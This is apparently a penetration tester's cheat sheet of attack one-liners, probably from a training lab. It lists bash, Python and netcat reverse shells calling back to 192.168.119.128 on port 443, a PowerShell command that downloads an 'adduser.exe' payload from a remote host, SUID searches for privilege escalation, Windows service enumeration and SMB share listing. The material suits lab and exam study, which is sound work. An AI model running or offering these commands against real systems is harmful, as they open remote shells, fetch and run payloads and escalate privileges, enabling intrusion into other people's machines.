bash -i >& /dev/tcp/192.168.119.128/443 0>&1

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

mkfifo t1;cat t1 | /bin/bash -I 2>&1 | nc 192.168.119.128 443 > t1


python -c 'import pty; pty.spawn("/bin/bash")'

find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -ug=rwx 2>/dev/null

cscript wget.vbs http://xxxx xxxx

find / -type f -name "*.log" | xargs grep "ERROR"

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

Get-WmiObject win32_service | Select-Object PathName


powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.92.131/adduser.exe', 'adduser.exe')


wmic service where caption="Apache" get name,startmode


smbclient -L //10.11.1.8 --option='client min protocol=NT1'